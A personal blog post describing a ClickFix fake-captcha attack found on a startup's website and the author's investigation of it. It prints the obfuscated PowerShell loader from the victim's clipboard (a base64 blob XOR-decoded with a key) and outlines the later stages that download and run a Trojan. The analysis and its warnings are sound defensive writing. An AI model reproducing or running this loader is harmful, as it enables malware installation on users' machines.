Aura of Mystique

As a child and teenager the concept of malware always had an aura of mystique for me. It was this thing that everyone was trying to avoid, meanwhile very few people actually understood it. As someone who got somewhat interested in coding in my mid teens, I knew roughly what it did and conceptually how its done. Though the actual functionality was always beyond my knowledge. Considering the amount of warning and talk about it, for me personally malware never really presented itself. It can of course be argued that it was exactly because I was learning early on how one avoids it. For me it seemed like one of those things that seem like a huge problem as a child, like the canon event that every child has, when it realizes the sun will eventually blow up, but turns out not to be such a big deal once you get older. While there are victims of cybercrime and I do not want to downplay that, I personally have never actually encountered (at least knowingly) malware in the wild. This changed last week which is what I wanna talk about today.

In the Beginning there was a Captcha

Now one might expect some wild story of some obscure site on a suspect corner of the internet was to blame. However quite to the contrary. Someone mentioned a weird captcha prompt one a website from a university startup on a discord I frequent. The following is what a user was prompted with after clicking the square in the common cloudflare captcha.

Someone in the field of Computer-Science is immediately gonna be on high alert seeing this. But it should be said that this is a very real, and persumably effective, attack called ClickFix. I am aware that the attack chain I will explain is likely common and nothing special. This is mostly to describe the process we (2 people on the discord alongside me) went through investingating this suspicious captcha prompt. This is in no way a analysis of effectiveness or the like.

Please execute whatever is in your clipboard

While I am writing this I have not yet discovered what exactly hijacked the clients clipboard. Regardless after we discussed it a bit we uncovered it did inject adaptively to your OS. From now on I will be refering to the Windows version since that is what I ran at the time. So what is it they wanted you to paste into your terminal?

nVMM='X2SKtE9uSZeHrEc';
$tNLo=[convert]::FromBase64String('ERI3JFQrVgFzMQsnBWUUMFMnawAtXFU/OxJoHioMM0FzJx0uXFU1NRdoAjABNFsgIx0rXlUnMgw7Ui4KNlZzJBJlSgEmPANoASpDMVwgPxEkXVU7OxMtUjELMUFzIwAxSQZpdUoxHTAXLRwxLlsMTjkAKCs9QzUTEQ==');
$y3JM='';
for($pdHBcbB=0;$pdHBcbB -lt $tNLo.Length;$pdHBcbB++){
    $y3JM+=[char]($tNLo[$pdHBcbB]-bxor[byte][char]$nVMM[$pdHBcbB%$nVMM.Length])
};
$GUBgdBMx=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($y3JM));

This is quite obviously is just a layer of obfuscation. To recover the actual code that runs we convert from Base64 and Xor with the key in nVMM. There is an almost identical layer behind that and after deobfuscating that, we get the actual payload that was put into the clipboard in a readable format. A functional summary of that looks like this:

1. Fetch unzipping utility from one of their domains
2. Fetch a Zip archive, this is the malware
3. Extract the .exe from the Archive with the key 
4. Run the exe

After booting up a vm I did fetch the Zip and therefore the exe. At this point I have not managed to reverse engineer this myself. Incase I do manage to in the future I might add onto this post or create a followup. After uploading the file to Virustotal we had confirmation. This was a Trojan. There I had it. After all these years, I had actually uncovered and archived a piece of malware in the real world with the help of some friends.

This is only half the puzzle tho. How did this end up on a website that didnt know anything about it? My first guess is some package they used was vulnerable. Since they mentioned they do not update often that seems unlikely as that would mean they served malware for a long time without anyone realizing it. Unless the build more often than they mentioned. Another option is that one of the devs got pwned and someone smuggled in the malicious code into the GitHub repo that way. Unfortunately I think it is rather difficult if not impossible to find the exact cause without access to their private repo.

Maybe something to mention is that someone did mention that they had “slopped” the website. This was aligning with what we saw in the discord chat, as the owner of the site did join us to figure out what happened and kept pasting LLM responses into the chat.

Conclusions and what not to do I guess

The first thing I would mention is that seemingly “easy to detect” attacks are still very much so existent which implies that people do fall for them. For anyone with some tech knowledge it might seem insane to just blindly paste and execute something in the terminal but for someone who isnt as knowledgable on this topic it might seem like “the new thing” that is used to detect bots. We should try to teach people, especially non tech affine, about these kinds of methods. While this is certainly no groundbreaking new discovery, I still enjoyed digging through the exploit chain for an afternoon. The current status about how this came about is still unknown. The owner rebuilt the page and updated all packages and it seems to no longer be an issue.

As a final note: I personally would not recommend having a website that is purely made by AI. I think it is essential that someone knows what is being used and is aware of the risks and security.